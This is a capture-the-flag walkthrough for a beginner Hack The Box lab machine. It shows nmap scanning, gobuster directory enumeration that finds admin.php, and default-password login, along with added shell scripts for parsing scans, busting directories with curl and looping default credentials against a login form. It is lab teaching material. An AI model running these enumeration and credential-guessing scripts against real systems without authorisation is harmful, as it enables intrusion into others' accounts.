The aim of this walkthrough is to provide help with the Preignition machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.
It belongs to a series of tutorials that aim to help out complete beginners with finishing the Starting Point TIER 0 challenges.
SETUP
There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.
Once our connection is taken care of, we spawn the target machine.
Additionally, and purely for convenience, we can store the target host's IP address in a shell variable. It lives only in the current shell (child processes do not see it unless you export it), and we read it back by prefixing the name with a $. Note that there must be no spaces around the = sign.
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $ echo $rhost
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
Use the unset command to remove it once you no longer need it.
┌─[✗]─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $unset rhost
┌─[htb-bluewalle@htb-pwdysfiide]─[~/Desktop]
└──╼ $
TASK 1
Question: Directory Brute-forcing is a technique used to check a lot of paths on a web server to find hidden pages. Which is another name for this? (i) Local File Inclusion, (ii) dir busting, (iii) hash cracking.
The internet is such a helpful friend…
dir busting
TASK 2
Question: What switch do we use for nmap’s scan to specify that we want to perform version detection
Run nmap's help to determine the correct switch/option/flag…
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap --help
...
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
...
-sV
TASK 3
Question: What does Nmap report is the service identified as running on port 80/tcp?
Run nmap with no options against the target. As an unprivileged user this is a TCP connect scan of the 1,000 most common TCP ports (hence the "conn-refused" note for the closed ones), and the SERVICE column is only a lookup of the port number in nmap's services table, not the result of talking to the port.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 20:07 BST
Nmap scan report for 10.129.211.155
Host is up (0.11s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
http
TASK 4
Question: What server name and version of service is running on port 80/tcp?
Now re-run nmap with the -sV switch from TASK 2, limited to port 80 with -p 80 so that only the port we care about is probed. This time nmap actually sends probes and reads the banner, which is why a product name and version appear.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $nmap -sV -p 80 $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-04 20:09 BST
Nmap scan report for 10.129.211.155
Host is up (0.012s latency).
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.52 seconds
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
nginx 1.14.2
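The two scans above can be automated and their results parsed rather than read off the screen. The following is an added example, not part of the original walkthrough, that runs nmap with grepable output (-oG -) and extracts host, port, service and version with awk. The sample output embedded in the script is constructed to mirror the page's result so the parser can be exercised offline; the real invocation is shown in the comment.

```shell
#!/bin/sh
# Added example: parse nmap's grepable (-oG) output into "host port/proto service version" rows.
# Against the real target the pipeline would be:
#   nmap -sV -p 80 -oG - "$rhost" | parse_nmap_grepable
# The sample below is constructed to match the page's result; nmap separates the
# fields of a Host: line with tabs, so it is built with printf to keep them intact.
SAMPLE_GREPABLE=$(printf 'Host: 10.129.211.155 ()\tStatus: Up\nHost: 10.129.211.155 ()\tPorts: 80/open/tcp//http//nginx 1.14.2/\n')

# Reads grepable output on stdin and prints one line per open port:
#   <host> <port>/<proto> <service> <version>
# Each entry in the Ports: field has the layout
#   port/state/protocol/owner/service/rpc-info/version/
parse_nmap_grepable() {
    awk -F'\t' '
        /^Host:/ && $2 ~ /^Ports:/ {
            host = $1; sub(/^Host: /, "", host); sub(/ .*/, "", host)
            ports = $2; sub(/^Ports: /, "", ports)
            n = split(ports, p, /, /)
            for (i = 1; i <= n; i++) {
                split(p[i], f, "/")
                if (f[2] == "open")
                    printf "%s %s/%s %s %s\n", host, f[1], f[3], f[5], f[7]
            }
        }'
}

# Offline helper: parse the constructed sample.
summarise_sample() {
    printf '%s\n' "$SAMPLE_GREPABLE" | parse_nmap_grepable
}

# Running this file directly prints the parsed sample.
summarise_sample
```

The same parser works unchanged on a full -sV sweep (several comma-separated entries in the Ports: field), which makes it easy to feed discovered services into later steps such as the gobuster run below.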
TASK 5
Question: What switch do we use to specify to Gobuster we want to perform dir busting specifically?
Well, how about some --help again…
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $gobuster --help
Usage:
gobuster [command]
Available Commands:
dir Uses directory/file enumeration mode
dns Uses DNS subdomain enumeration mode
fuzz Uses fuzzing mode
help Help about any command
s3 Uses aws bucket enumeration mode
version shows the current version
vhost Uses VHOST enumeration mode
Flags:
--delay duration Time each thread waits between requests (e.g. 1500ms)
-h, --help help for gobuster
--no-error Don't display errors
-z, --no-progress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-p, --pattern string File containing replacement patterns
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist
Use "gobuster [command] --help" for more information about a command.
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
dir
TASK 6
Question: When using gobuster to dir bust, what switch do we add to make sure it finds PHP pages?
And again…
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $gobuster dir --help
Uses directory/file enumeration mode
Usage:
gobuster dir [flags]
Flags:
-f, --add-slash Append / to each request
-c, --cookies string Cookies to use for the requests
-d, --discover-backup Upon finding a file search for backup files
--exclude-length ints exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes.
-e, --expanded Expanded mode, print full URLs
-x, --extensions string File extension(s) to search for
-r, --follow-redirect Follow redirects
-H, --headers stringArray Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
-h, --help help for dir
--hide-length Hide the length of the body in the output
-m, --method string Use the following HTTP method (default "GET")
-n, --no-status Don't print status codes
-k, --no-tls-validation Skip TLS certificate verification
-P, --password string Password for Basic Auth
--proxy string Proxy to use for requests [http(s)://host:port]
--random-agent Use a random User-Agent string
-s, --status-codes string Positive status codes (will be overwritten with status-codes-blacklist if set)
-b, --status-codes-blacklist string Negative status codes (will override status-codes if set) (default "404")
--timeout duration HTTP Timeout (default 10s)
-u, --url string The target URL
-a, --useragent string Set the User-Agent string (default "gobuster/3.1.0")
-U, --username string Username for Basic Auth
--wildcard Force continued operation when wildcard found
Global Flags:
--delay duration Time each thread waits between requests (e.g. 1500ms)
--no-error Don't display errors
-z, --no-progress Don't display progress
-o, --output string Output file to write results to (defaults to stdout)
-p, --pattern string File containing replacement patterns
-q, --quiet Don't print the banner and other noise
-t, --threads int Number of concurrent threads (default 10)
-v, --verbose Verbose output (errors)
-w, --wordlist string Path to the wordlist
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
-x php
TASK 7
Question: What page is found during our dir busting activities?
Use the -u flag to specify the target URL and the -w flag to specify the wordlist for the directory/file enumeration. One of the most commonly used lists is /usr/share/wordlists/dirb/common.txt, which comes from the dirb package (on Kali the wordlists metapackage pulls it in); if it is missing, install dirb or substitute a list from SecLists (package seclists, under /usr/share/seclists). Gobuster prepends http:// when the URL has no scheme, which is why a bare $rhost works here.
┌─[✗]─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $gobuster dir -x php -w /usr/share/wordlists/dirb/common.txt -u $rhost
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.211.155
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2023/05/04 20:18:30 Starting gobuster in directory enumeration mode
===============================================================
/admin.php (Status: 200) [Size: 999]
/admin.php (Status: 200) [Size: 999]
===============================================================
2023/05/04 20:18:41 Finished
===============================================================
┌─[htb-bluewalle@htb-fjpem3fvtz]─[~/Desktop]
└──╼ $
admin.php
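The doubled /admin.php line in the output above is not a glitch: with -x php gobuster requests both the bare word and word.php for every entry, and common.txt contains both "admin" and "admin.php", so the same URL is requested and reported twice. The following is an added example, not gobuster's own code, that reproduces that expansion over a constructed slice of the wordlist, finds the collisions, and includes a minimal curl-based dir buster for the real target (the bust function is the only part that touches the network).

```shell
#!/bin/sh
# Added example (not gobuster's code): what "-x php" does to a wordlist, why
# /admin.php was reported twice above, and a minimal curl-based dir buster.

# Constructed slice of a dirb/common.txt-style wordlist. Like the real list it
# contains both "admin" and "admin.php".
WORDLIST='admin
admin.php
index
login'

# Expand every word the way gobuster does: the bare word, then word.<ext> for
# each comma-separated extension given (e.g. "php" or "php,txt").
expand_wordlist() {   # $1 = extensions; wordlist on stdin; paths on stdout
    exts=$(printf '%s' "$1" | tr ',' ' ')
    while IFS= read -r word; do
        [ -n "$word" ] || continue
        printf '/%s\n' "$word"
        for ext in $exts; do
            printf '/%s.%s\n' "$word" "$ext"
        done
    done
}

# Paths that the expansion produces more than once. "admin" + ".php" collides
# with the literal "admin.php" entry, so that URL is requested (and reported)
# twice unless the list is de-duplicated first.
duplicate_paths() {   # expanded paths on stdin
    sort | uniq -d
}

# Minimal dir buster: request each path and print "<status> <path>" for anything
# other than 404. Only run it against a host you are authorised to test:
#   printf '%s\n' "$WORDLIST" | expand_wordlist php | sort -u | bust "http://$rhost"
bust() {   # $1 = base URL; paths on stdin
    base=${1%/}
    while IFS= read -r path; do
        code=$(curl -s -o /dev/null -w '%{http_code}' "$base$path")
        if [ "$code" != "404" ]; then
            printf '%s %s\n' "$code" "$path"
        fi
    done
}

# Offline helpers over the constructed wordlist.
expanded_sample()  { printf '%s\n' "$WORDLIST" | expand_wordlist php; }
duplicate_sample() { expanded_sample | duplicate_paths; }

# Running the file directly shows the doubled path.
duplicate_sample
```

Piping the expanded list through sort -u before bust, as in the comment, removes the duplicate request; gobuster's own -b (status-code blacklist) defaults to 404, which is what the bust function's filter mirrors.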
TASK 8
Question: What is the HTTP status code reported by Gobuster for the discovered page?
See the gobuster enumeration results in the previous task.
200
SUBMIT FLAG
Question: Submit root flag
An admin.php page is an obvious place to look, so check it out.
Use your browser to open http://<target-machine-ip>/admin.php. Once the page has loaded, it asks for a username and password.
Since this is the admin login page, a reasonable guess is that one of the users is named admin. Trying a few default credential pairs (admin:password | admin:Password | admin:admin) will provide you with the flag. Note that this is the whole vulnerability on this box: an administrative page exposed to the network and protected only by a default password.
flag
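The same guessing can be done from the shell with curl instead of retyping pairs into the browser. The following is an added example, not part of the walkthrough, and it rests on two assumptions that the page does not confirm: that the form posts fields named username and password, and that a failed login re-serves the form (so a response body without a form means the pair was accepted). Check the page source before relying on either; if the page turns out to use HTTP Basic authentication instead, the curl call becomes curl -s --fail -u "user:pass" url. The stub login function and the admin:letmein pair exist only so the loop can be exercised offline.

```shell
#!/bin/sh
# Added example, not part of the walkthrough: trying the suggested default
# credential pairs with curl instead of typing them into the browser.
# ASSUMPTIONS (check the page source first: curl -s "$url" | grep -i -A5 '<form'):
#   - the login form POSTs fields named "username" and "password";
#   - a failed login re-serves the form, so a body without "<form" means success.
# If the page uses HTTP Basic auth instead, replace the curl call in form_login
# with: curl -s --fail -u "$2:$3" "$1"

# The pairs suggested above, one user:pass per line.
DEFAULT_CREDS='admin:password
admin:Password
admin:admin'

# Real attempt: returns 0 if the pair is accepted, 1 otherwise.
# A transport or HTTP error (--fail) counts as a failed attempt, never as success.
form_login() {   # $1 = url, $2 = user, $3 = pass
    body=$(curl -s --fail \
        --data-urlencode "username=$2" \
        --data-urlencode "password=$3" "$1") || return 1
    printf '%s' "$body" | grep -qi '<form' && return 1
    return 0
}

# Walk the list, stop at the first accepted pair and print it (exit 0); exit 1
# if none works. $2 names the login function so the loop can run offline with a
# stub; $3 is the pause between attempts, because real applications may lock an
# account after a handful of failures.
try_default_creds() {   # $1 = url, $2 = login function, $3 = delay in s; creds on stdin
    url=$1; login=$2; delay=${3:-1}
    while IFS=: read -r user pass; do
        [ -n "$user" ] || continue
        if "$login" "$url" "$user" "$pass"; then
            printf '%s:%s\n' "$user" "$pass"
            return 0
        fi
        sleep "$delay"
    done
    return 1
}

# Offline stub: accepts only the constructed pair admin:letmein (invented for
# the demo; it is not a hint about the target).
stub_login() { [ "$2:$3" = "admin:letmein" ]; }

# Demo run: the three suggested pairs are rejected by the stub, the fourth is accepted.
demo_spray() {
    printf '%s\nadmin:letmein\n' "$DEFAULT_CREDS" \
        | try_default_creds 'http://example.invalid/admin.php' stub_login 0
}

# Against the real target (authorised testing only):
#   printf '%s\n' "$DEFAULT_CREDS" | try_default_creds "http://$rhost/admin.php" form_login
demo_spray
```

Keep the delay on real targets: a login page that locks the account after a few failures turns a guessing loop into a denial of service against the very account you are testing.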
Make sure to terminate the target box before you continue with the next machine!